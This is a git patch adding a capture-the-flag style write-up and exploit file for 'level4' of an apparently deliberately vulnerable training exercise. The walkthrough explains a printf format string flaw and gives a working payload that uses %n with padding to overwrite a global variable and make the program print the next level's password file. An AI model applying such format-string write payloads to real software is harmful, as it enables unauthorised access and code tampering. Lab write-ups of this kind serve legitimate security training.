From 9d3bc5d550aa9dab36534ca71c63db11f37dcd94 Mon Sep 17 00:00:00 2001 From: 0x35c Date: Tue, 29 Apr 2025 12:00:07 +0200 Subject: [PATCH] level4 done --- level4/ressources/exploit | 1 + level4/walkthrough | 17 +++++++++++++++++ 2 files changed, 18 insertions(+) create mode 100644 level4/ressources/exploit create mode 100644 level4/walkthrough diff --git a/level4/ressources/exploit b/level4/ressources/exploit new file mode 100644 index 0000000..dedc96c --- /dev/null +++ b/level4/ressources/exploit @@ -0,0 +1 @@ +(python -c 'print "\x10\x98\x04\x08" + "%16930112p" + "%12$n"'; cat) | ./level4 diff --git a/level4/walkthrough b/level4/walkthrough new file mode 100644 index 0000000..c0ec80e --- /dev/null +++ b/level4/walkthrough @@ -0,0 +1,17 @@ +# Level4 + +Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. +This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). +We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`. +Our goal here will be to change the value of this variable in order to get the password. + +To do so, we will first dump the stack to know where the buffer is located. +Let's print something basic like `print("AAAA" + "%x"*20)`. We can see that 0x41414141 (= "AAAA") is printed at the 12th position in the stack. +Now that we know where our buffer is located on the stack, let's exploit printf. + +By using the `%n` flag, we can change the value of a variable to the length of what's been printed before (here, `m == 16930116`). +Since we cannot pass arguments to printf directly, we need to specify the position in the stack of the variable we want `%n` to print to. This is achieved by writing `m`'s address (obtained through gdb, static address since ASLR is disabled) at the beginning of the buffer. +Finally, we print the 16930112 bytes (+ 4 bytes for the address have already been printed) so that `m == 16930116`. +Unfortunately, unlike the previous level, we cannot print all the bytes directly in the buffer. For this, we will use printf's padding feature to print the right number of bytes. +Here is the command: +`(python -c 'print "\x10\x98\x04\x08" + "%16930112p" + "%12$n"'; cat) | ./level4`